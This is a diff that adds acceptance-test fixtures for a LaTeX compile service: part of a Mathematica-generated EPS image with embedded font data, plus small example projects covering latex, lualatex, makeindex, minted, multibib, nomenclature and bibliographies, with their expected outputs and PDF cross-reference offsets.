+F44B2EB0AD94211733F226B570E9D963AF9A6DF04FDFA26C0BDF31EDC41DA521F9D0090A9FA5DD13 +B9D977329F6412815A8C52C3290DD42EDBD312592DACBE0BFDEA209F389DE8E4B5D8ED51B46F1557 +C2B50098C2262D3DB298E12C0AC3E03B82CD2807CE04E109ADD00EB181D701E4BC3622DE8A86E977 +3D6C4AEB830F3283BCCEA663AFAB740B546C3577E9182EFE660AB380F0504590CEEC89313A608A29 +9F9DFFE22DA6296EA3E39857D7229885C78F097E7E7845E6C908A0570D4ED0AE320DFADB7AF87E5D 
+% [eexec-encrypted Type 1 font data elided: several hundred lines of hexadecimal] +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000
+0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +0000000000000000000000000000000000000000000000000000000000000000 +cleartomark{restore}if + +%%EndFont +%%EndResource +9.72 /Mathematica2 Msf +0 9 m +(\310) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +2.25 9 m +(q) N +9.72 /Mathematica2 Msf +7.5 9 m +(\310) N +9.72 /Mathematica1 Msf +12 9 m +(=) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +p +20.25 9 m +(0) N +P +p +24.75 9 m +(.) N +P +p +27 9 m +(0) N +P +p +31.5 9 m +(2) N +P +P +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +P +P +[1 0 0 1 -118.485 -136.705 ] concat +1 w +[ ] 0 setdash +P +P +p +np 181 96 m +181 112 L +219 112 L +219 96 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 181.505 96.904 ] concat +1 w +[ ] 0 setdash +p +np -1.505 -1.904 m +-1.505 16.096 L +38.495 16.096 L +38.495 -1.904 L +cp +clip np +p +np 0.495 0.0956 m +0.495 13.096 L +37.495 13.096 L +37.495 0.0956 L +cp +clip np +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +p +np -1.505 -0.904 m +-1.505 15.096 L +38.495 15.096 L +38.495 -0.904 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +9.72 /Mathematica2 Msf +0 9 m +(\310) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +2.25 9 m +(q) N +9.72 /Mathematica2 Msf +7.5 9 m +(\310) N +9.72 /Mathematica1 Msf +12 9 m +(=) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +p +20.25 9 m +(0) N +P +p +24.75 9 m +(.) N +P +p +27 9 m +(0) N +P +p +31.5 9 m +(5) N +P +P +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +P +P +[1 0 0 1 -181.505 -96.904 ] concat +1 w +[ ] 0 setdash +P +P +p +np 267 3 m +267 19 L +305 19 L +305 3 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 267.864 4.035 ] concat +1 w +[ ] 0 setdash +p +np -1.864 -2.035 m +-1.864 15.965 L +38.136 15.965 L +38.136 -2.035 L +cp +clip np +p +np 0.136 -0.0353 m +0.136 12.965 L +36.136 12.965 L +36.136 -0.0353 L +cp +clip np +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +p +np -1.864 -1.035 m +-1.864 14.965 L +38.136 14.965 L +38.136 -1.035 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +9.72 /Mathematica2 Msf +0 9 m +(\310) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +2.25 9 m +(q) N +9.72 /Mathematica2 Msf +7.5 9 m +(\310) N +9.72 /Mathematica1 Msf +12 9 m +(=) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +p +20.25 9 m +(0) N +P +p +24.75 9 m +(.) 
N +P +p +27 9 m +(0) N +P +p +31.5 9 m +(7) N +P +P +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +P +P +[1 0 0 1 -267.864 -4.035 ] concat +1 w +[ ] 0 setdash +P +P +p +np 295 86 m +295 102 L +328 102 L +328 86 L +cp +clip np +p +1 w +1 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +[1 0 0 1 295.617 86.954 ] concat +1 w +[ ] 0 setdash +p +np -1.617 -1.954 m +-1.617 16.046 L +33.383 16.046 L +33.383 -1.954 L +cp +clip np +p +np 0.383 0.0458 m +0.383 13.046 L +32.383 13.046 L +32.383 0.0458 L +cp +clip np +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +p +np -1.617 -0.954 m +-1.617 15.046 L +33.383 15.046 L +33.383 -0.954 L +cp +clip np +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +9.72 /Mathematica2 Msf +0 9 m +(\310) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +2.25 9 m +(q) N +9.72 /Mathematica2 Msf +7.5 9 m +(\310) N +9.72 /Mathematica1 Msf +12 9 m +(=) N +%%IncludeResource: font Times-Roman-MISO +%%IncludeFont: Times-Roman-MISO +9.72 /Times-Roman-MISO Msf +p +20.25 9 m +(0) N +P +p +24.75 9 m +(.) N +P +p +27 9 m +(1) N +P +P +[1 0 0 1 0 0 ] concat +1 w +[ ] 0 setdash +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +P +P +[1 0 0 1 -295.617 -86.954 ] concat +1 w +[ ] 0 setdash +P +P +P +P +P +1 w +0 g +0 g +[ ] 0 setdash +2 setlinecap +0 setlinejoin +10 setmiterlimit +%Trailer +%EOF diff --git a/services/clsi/test/acceptance/fixtures/examples/latex_compiler/main.tex b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/main.tex new file mode 100644 index 0000000..76fd8e5 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/main.tex @@ -0,0 +1,9 @@ +\documentclass[a4paper]{article} + +\usepackage{graphicx} + +\begin{document} + +\includegraphics[width=\textwidth]{image.eps} + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/latex_compiler/options.json b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/options.json new file mode 100644 index 0000000..a280541 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/options.json @@ -0,0 +1,3 @@ +{ + "compiler": "latex" +} diff --git a/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.dvi b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.dvi new file mode 100644 index 0000000..84888d7 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.dvi differ diff --git a/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.pdf b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.pdf new file mode 100644 index 0000000..d4b5387 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.pdfxref new file mode 100644 index 0000000..8221852 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/latex_compiler/output.pdfxref @@ -0,0 +1,26 @@ +1/0: uncompressed; offset = 25097 +2/0: uncompressed; offset = 25156 +3/0: uncompressed; offset = 25367 +4/0: uncompressed; offset = 15 +5/0: uncompressed; offset = 854 +6/0: uncompressed; offset = 919 +7/0: uncompressed; offset = 
1074 +8/0: uncompressed; offset = 1245 +9/0: uncompressed; offset = 18343 +10/0: uncompressed; offset = 18388 +11/0: uncompressed; offset = 18752 +12/0: uncompressed; offset = 19071 +13/0: uncompressed; offset = 19360 +14/0: uncompressed; offset = 19604 +15/0: uncompressed; offset = 19770 +16/0: uncompressed; offset = 20007 +17/0: uncompressed; offset = 20174 +18/0: uncompressed; offset = 20424 +19/0: uncompressed; offset = 20456 +20/0: uncompressed; offset = 20525 +21/0: uncompressed; offset = 23109 +22/0: uncompressed; offset = 23500 +23/0: uncompressed; offset = 24229 +24/0: uncompressed; offset = 24641 +25/0: uncompressed; offset = 24741 +26/0: uncompressed; offset = 24985 diff --git a/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/main.tex b/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/main.tex new file mode 100644 index 0000000..28da61e --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/main.tex @@ -0,0 +1,8 @@ +\documentclass{article} +\usepackage{luacode} + +\begin{document} +\begin{luacode} +tex.print("Hello world") +\end{luacode} +\end{document} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/options.json b/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/options.json new file mode 100644 index 0000000..96a0543 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/options.json @@ -0,0 +1,3 @@ +{ + "compiler": "lualatex" +} diff --git a/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/output.pdf b/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/output.pdf new file mode 100644 index 0000000..57c6874 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/output.pdfxref new file mode 100644 index 0000000..6e59a2d --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/lualatex_compiler/output.pdfxref @@ -0,0 +1,18 @@ +1/0: uncompressed; offset = 3568 +2/0: uncompressed; offset = 3777 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 643 +6/0: uncompressed; offset = 693 +7/0: uncompressed; offset = 819 +8/0: uncompressed; offset = 934 +9/0: uncompressed; offset = 1118 +10/0: uncompressed; offset = 1210 +11/0: uncompressed; offset = 2555 +12/0: uncompressed; offset = 3030 +13/0: compressed; stream = 12, index = 0 +14/0: compressed; stream = 12, index = 1 +15/0: compressed; stream = 12, index = 2 +16/0: compressed; stream = 12, index = 3 +17/0: compressed; stream = 12, index = 4 +18/0: compressed; stream = 12, index = 5 diff --git a/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/main.tex b/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/main.tex new file mode 100644 index 0000000..fce2826 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/main.tex @@ -0,0 +1,12 @@ +\documentclass{article} + +\usepackage{makeidx} +\makeindex + +\begin{document} + +To solve various problems in Physics \index{Physics} it can be useful to express any arbitrary piecewise-smooth function as a Fourier Series \index{Fourier Series} composed of multiple sine and cosine functions.
+ +\printindex + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/output.pdf b/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/output.pdf new file mode 100644 index 0000000..36fdb35 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/output.pdfxref new file mode 100644 index 0000000..6557c98 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/output.pdfxref @@ -0,0 +1,26 @@ +1/0: uncompressed; offset = 16762 +2/0: uncompressed; offset = 16877 +3/0: uncompressed; offset = 17142 +4/0: uncompressed; offset = 24335 +5/0: uncompressed; offset = 32164 +6/0: uncompressed; offset = 32412 +7/0: uncompressed; offset = 15 +8/0: uncompressed; offset = 216 +9/0: uncompressed; offset = 671 +10/0: uncompressed; offset = 721 +11/0: uncompressed; offset = 856 +12/0: uncompressed; offset = 973 +13/0: uncompressed; offset = 1318 +14/0: uncompressed; offset = 2218 +15/0: compressed; stream = 13, index = 0 +16/0: compressed; stream = 13, index = 1 +17/0: compressed; stream = 13, index = 2 +18/0: compressed; stream = 13, index = 3 +19/0: compressed; stream = 13, index = 4 +20/0: compressed; stream = 13, index = 5 +21/0: compressed; stream = 13, index = 6 +22/0: compressed; stream = 13, index = 7 +23/0: compressed; stream = 13, index = 8 +24/0: compressed; stream = 13, index = 9 +25/0: compressed; stream = 13, index = 10 +26/0: compressed; stream = 13, index = 11 diff --git a/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/style.ist b/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/style.ist new file mode 100644 index 0000000..bdae874 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/makeindex-custom-style/style.ist @@ -0,0 +1,7 @@ +heading_prefix "{\\bfseries\\hfil " +heading_suffix "\\hfil}\\nopagebreak\n" +headings_flag 1 +delim_0 "\\dotfill" +delim_1 "\\dotfill" +delim_2 "\\dotfill" + diff --git a/services/clsi/test/acceptance/fixtures/examples/makeindex/main.tex b/services/clsi/test/acceptance/fixtures/examples/makeindex/main.tex new file mode 100644 index 0000000..fce2826 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/makeindex/main.tex @@ -0,0 +1,12 @@ +\documentclass{article} + +\usepackage{makeidx} +\makeindex + +\begin{document} + +To solve various problems in Physics \index{Physics} it can be useful to express any arbitrary piecewise-smooth function as a Fourier Series \index{Fourier Series} composed of multiple sine and cosine functions.
+ +\printindex + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/makeindex/output.pdf b/services/clsi/test/acceptance/fixtures/examples/makeindex/output.pdf new file mode 100644 index 0000000..331c03b Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/makeindex/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/makeindex/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/makeindex/output.pdfxref new file mode 100644 index 0000000..7188737 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/makeindex/output.pdfxref @@ -0,0 +1,22 @@ +1/0: uncompressed; offset = 16778 +2/0: uncompressed; offset = 16893 +3/0: uncompressed; offset = 17109 +4/0: uncompressed; offset = 24938 +5/0: uncompressed; offset = 25186 +6/0: uncompressed; offset = 15 +7/0: uncompressed; offset = 216 +8/0: uncompressed; offset = 650 +9/0: uncompressed; offset = 700 +10/0: uncompressed; offset = 836 +11/0: uncompressed; offset = 953 +12/0: uncompressed; offset = 1298 +13/0: uncompressed; offset = 2103 +14/0: compressed; stream = 12, index = 0 +15/0: compressed; stream = 12, index = 1 +16/0: compressed; stream = 12, index = 2 +17/0: compressed; stream = 12, index = 3 +18/0: compressed; stream = 12, index = 4 +19/0: compressed; stream = 12, index = 5 +20/0: compressed; stream = 12, index = 6 +21/0: compressed; stream = 12, index = 7 +22/0: compressed; stream = 12, index = 8 diff --git a/services/clsi/test/acceptance/fixtures/examples/minted/main.tex b/services/clsi/test/acceptance/fixtures/examples/minted/main.tex new file mode 100644 index 0000000..633abf7 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/minted/main.tex @@ -0,0 +1,10 @@ +\documentclass{article} +\usepackage{minted} +\begin{document} +\begin{minted}{c} +int main() { + printf("hello, world"); + return 0; +} +\end{minted} +\end{document} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/minted/output.pdf b/services/clsi/test/acceptance/fixtures/examples/minted/output.pdf new file mode 100644 index 0000000..4343a71 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/minted/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/minted/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/minted/output.pdfxref new file mode 100644 index 0000000..6117648 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/minted/output.pdfxref @@ -0,0 +1,19 @@ +1/0: uncompressed; offset = 20679 +2/0: uncompressed; offset = 20927 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 650 +6/0: uncompressed; offset = 700 +7/0: uncompressed; offset = 826 +8/0: uncompressed; offset = 934 +9/0: uncompressed; offset = 1252 +10/0: uncompressed; offset = 8248 +11/0: uncompressed; offset = 20115 +12/0: compressed; stream = 11, index = 0 +13/0: compressed; stream = 11, index = 1 +14/0: compressed; stream = 11, index = 2 +15/0: compressed; stream = 11, index = 3 +16/0: compressed; stream = 11, index = 4 +17/0: compressed; stream = 11, index = 5 +18/0: compressed; stream = 11, index = 6 +19/0: compressed; stream = 11, index = 7 diff --git a/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/bibliography.bib b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/bibliography.bib new file mode 100644 index 0000000..29728ba --- /dev/null +++ 
b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/bibliography.bib @@ -0,0 +1,15 @@ +@book{DouglasAdams, + title={The Hitchhiker's Guide to the Galaxy}, + author={Adams, Douglas}, + isbn={9781417642595}, + url={http://books.google.com/books?id=W-xMPgAACAAJ}, + year={1995}, + publisher={San Val} +} + +@book{Tolkien, + title={The Hobbit}, + author={Tolkien, J. R. R.}, + year={1904?} +} + diff --git a/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/main.tex b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/main.tex new file mode 100644 index 0000000..ff93b69 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/main.tex @@ -0,0 +1,23 @@ +\documentclass{report} + +\usepackage{multibib} +\newcites{one}{First references} + +\begin{document} + +\chapter{First chapter} + +The answer to life the universe and everything is 42 \citeone{DouglasAdams} + +\bibliographystyleone{plain} +\bibliographyone{bibliography} + +\chapter{Second chapter} + +All that glitters is not gold \cite{Tolkien} + +\bibliographystyle{plain} +\bibliography{bibliography} + +\end{document} + diff --git a/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/one.bbl b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/one.bbl new file mode 100644 index 0000000..3c63a37 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/one.bbl @@ -0,0 +1,8 @@ +\begin{thebibliography}{1} + +\bibitem{DouglasAdams} +Douglas Adams. +\newblock {\em The Hitchhiker's Guide to the Galaxy}. +\newblock San Val, 1995. + +\end{thebibliography} diff --git a/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.bbl b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.bbl new file mode 100644 index 0000000..df4ff87 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.bbl @@ -0,0 +1,8 @@ +\begin{thebibliography}{1} + +\bibitem{Tolkien} +J.~R.~R. Tolkien. +\newblock {\em The Hobbit}. +\newblock 1904? 
+ +\end{thebibliography} diff --git a/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.pdf b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.pdf new file mode 100644 index 0000000..7ff55c8 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.pdfxref new file mode 100644 index 0000000..2ceaa2b --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/multibib_bibliography/output.pdfxref @@ -0,0 +1,32 @@ +1/0: uncompressed; offset = 29506 +2/0: uncompressed; offset = 29621 +3/0: uncompressed; offset = 29918 +4/0: uncompressed; offset = 30033 +5/0: uncompressed; offset = 30274 +6/0: uncompressed; offset = 30389 +7/0: uncompressed; offset = 30644 +8/0: uncompressed; offset = 42802 +9/0: uncompressed; offset = 43050 +10/0: uncompressed; offset = 15 +11/0: uncompressed; offset = 216 +12/0: uncompressed; offset = 695 +13/0: uncompressed; offset = 746 +14/0: uncompressed; offset = 900 +15/0: uncompressed; offset = 1017 +16/0: uncompressed; offset = 1286 +17/0: uncompressed; offset = 2443 +18/0: uncompressed; offset = 13147 +19/0: compressed; stream = 16, index = 0 +20/0: compressed; stream = 16, index = 1 +21/0: compressed; stream = 16, index = 2 +22/0: compressed; stream = 16, index = 3 +23/0: compressed; stream = 16, index = 4 +24/0: compressed; stream = 16, index = 5 +25/0: compressed; stream = 16, index = 6 +26/0: compressed; stream = 16, index = 7 +27/0: compressed; stream = 16, index = 8 +28/0: compressed; stream = 16, index = 9 +29/0: compressed; stream = 16, index = 10 +30/0: compressed; stream = 16, index = 11 +31/0: compressed; stream = 16, index = 12 +32/0: compressed; stream = 16, index = 13 diff --git a/services/clsi/test/acceptance/fixtures/examples/nomenclature/main.tex b/services/clsi/test/acceptance/fixtures/examples/nomenclature/main.tex new file mode 100644 index 0000000..3fb928c --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/nomenclature/main.tex @@ -0,0 +1,25 @@ +\documentclass{article} + +\usepackage{nomencl} +\makenomenclature + +\begin{document} + +\section*{Main equations} + +\begin{equation} +a=\frac{N}{A} +\end{equation}% + +\nomenclature{$a$}{The number of angels per unit area}% +\nomenclature{$N$}{The number of angels per needle point}% +\nomenclature{$A$}{The area of the needle point}% + +The equation $\sigma = m a$% +\nomenclature{$\sigma$}{The total mass of angels per unit area}% +\nomenclature{$m$}{The mass of one angel} +follows easily. 
+ +\printnomenclature + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/nomenclature/output.pdf b/services/clsi/test/acceptance/fixtures/examples/nomenclature/output.pdf new file mode 100644 index 0000000..336ffa8 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/nomenclature/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/nomenclature/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/nomenclature/output.pdfxref new file mode 100644 index 0000000..cc3f61c --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/nomenclature/output.pdfxref @@ -0,0 +1,23 @@ +1/0: uncompressed; offset = 34102 +2/0: uncompressed; offset = 34350 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 678 +6/0: uncompressed; offset = 728 +7/0: uncompressed; offset = 856 +8/0: uncompressed; offset = 971 +9/0: uncompressed; offset = 1514 +10/0: uncompressed; offset = 10973 +11/0: uncompressed; offset = 19139 +12/0: uncompressed; offset = 33047 +13/0: compressed; stream = 12, index = 0 +14/0: compressed; stream = 12, index = 1 +15/0: compressed; stream = 12, index = 2 +16/0: compressed; stream = 12, index = 3 +17/0: compressed; stream = 12, index = 4 +18/0: compressed; stream = 12, index = 5 +19/0: compressed; stream = 12, index = 6 +20/0: compressed; stream = 12, index = 7 +21/0: compressed; stream = 12, index = 8 +22/0: compressed; stream = 12, index = 9 +23/0: compressed; stream = 12, index = 10 diff --git a/services/clsi/test/acceptance/fixtures/examples/references_in_include/chapter1.tex b/services/clsi/test/acceptance/fixtures/examples/references_in_include/chapter1.tex new file mode 100644 index 0000000..ded9bb4 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/references_in_include/chapter1.tex @@ -0,0 +1 @@ +\ref{two} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/references_in_include/chapter2.tex b/services/clsi/test/acceptance/fixtures/examples/references_in_include/chapter2.tex new file mode 100644 index 0000000..993a780 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/references_in_include/chapter2.tex @@ -0,0 +1,2 @@ +\section{Two} +\label{two} \ No newline at end of file diff --git a/services/clsi/test/acceptance/fixtures/examples/references_in_include/main.tex b/services/clsi/test/acceptance/fixtures/examples/references_in_include/main.tex new file mode 100644 index 0000000..0956f98 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/references_in_include/main.tex @@ -0,0 +1,8 @@ +\documentclass{article} + +\begin{document} + +\include{chapter1} +\include{chapter2} + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/references_in_include/output.pdf b/services/clsi/test/acceptance/fixtures/examples/references_in_include/output.pdf new file mode 100644 index 0000000..e740c94 Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/references_in_include/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/references_in_include/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/references_in_include/output.pdfxref new file mode 100644 index 0000000..744030a --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/references_in_include/output.pdfxref @@ -0,0 +1,22 @@ +1/0: uncompressed; offset = 9449 +2/0: uncompressed; offset = 9564 +3/0: uncompressed; offset = 
9730 +4/0: uncompressed; offset = 17293 +5/0: uncompressed; offset = 17541 +6/0: uncompressed; offset = 15 +7/0: uncompressed; offset = 216 +8/0: uncompressed; offset = 650 +9/0: uncompressed; offset = 700 +10/0: uncompressed; offset = 835 +11/0: uncompressed; offset = 952 +12/0: uncompressed; offset = 1097 +13/0: uncompressed; offset = 1758 +14/0: compressed; stream = 12, index = 0 +15/0: compressed; stream = 12, index = 1 +16/0: compressed; stream = 12, index = 2 +17/0: compressed; stream = 12, index = 3 +18/0: compressed; stream = 12, index = 4 +19/0: compressed; stream = 12, index = 5 +20/0: compressed; stream = 12, index = 6 +21/0: compressed; stream = 12, index = 7 +22/0: compressed; stream = 12, index = 8 diff --git a/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/bibliography.bib b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/bibliography.bib new file mode 100644 index 0000000..5e796e0 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/bibliography.bib @@ -0,0 +1,9 @@ +@book{DouglasAdams, + title={The Hitchhiker's Guide to the Galaxy}, + author={Adams, Douglas}, + isbn={9781417642595}, + url={http://books.google.com/books?id=W-xMPgAACAAJ}, + year={1995}, + publisher={San Val} +} + diff --git a/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/main.tex b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/main.tex new file mode 100644 index 0000000..33030bd --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/main.tex @@ -0,0 +1,10 @@ +\documentclass{article} + +\begin{document} + +The meaning of life, the universe and everything is 42 \cite{DouglasAdams} + +\bibliographystyle{plain} +\bibliography{bibliography} + +\end{document} diff --git a/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.bbl b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.bbl new file mode 100644 index 0000000..3c63a37 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.bbl @@ -0,0 +1,8 @@ +\begin{thebibliography}{1} + +\bibitem{DouglasAdams} +Douglas Adams. +\newblock {\em The Hitchhiker's Guide to the Galaxy}. +\newblock San Val, 1995. 
+ +\end{thebibliography} diff --git a/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.pdf b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.pdf new file mode 100644 index 0000000..517496b Binary files /dev/null and b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.pdf differ diff --git a/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.pdfxref b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.pdfxref new file mode 100644 index 0000000..6633bfb --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/simple_bibliography/output.pdfxref @@ -0,0 +1,23 @@ +1/0: uncompressed; offset = 37282 +2/0: uncompressed; offset = 37530 +3/0: uncompressed; offset = 15 +4/0: uncompressed; offset = 216 +5/0: uncompressed; offset = 678 +6/0: uncompressed; offset = 728 +7/0: uncompressed; offset = 856 +8/0: uncompressed; offset = 971 +9/0: uncompressed; offset = 1322 +10/0: uncompressed; offset = 9581 +11/0: uncompressed; offset = 24286 +12/0: uncompressed; offset = 36258 +13/0: compressed; stream = 12, index = 0 +14/0: compressed; stream = 12, index = 1 +15/0: compressed; stream = 12, index = 2 +16/0: compressed; stream = 12, index = 3 +17/0: compressed; stream = 12, index = 4 +18/0: compressed; stream = 12, index = 5 +19/0: compressed; stream = 12, index = 6 +20/0: compressed; stream = 12, index = 7 +21/0: compressed; stream = 12, index = 8 +22/0: compressed; stream = 12, index = 9 +23/0: compressed; stream = 12, index = 10 diff --git a/services/clsi/test/acceptance/fixtures/examples/subdirectories/chapter2.tex b/services/clsi/test/acceptance/fixtures/examples/subdirectories/chapter2.tex new file mode 100644 index 0000000..13a22d2 --- /dev/null +++ b/services/clsi/test/acceptance/fixtures/examples/subdirectories/chapter2.tex @@ -0,0 +1 @@ +This is chapter2.tex, included from main.tex. It's not in the same directory but can still be found. 
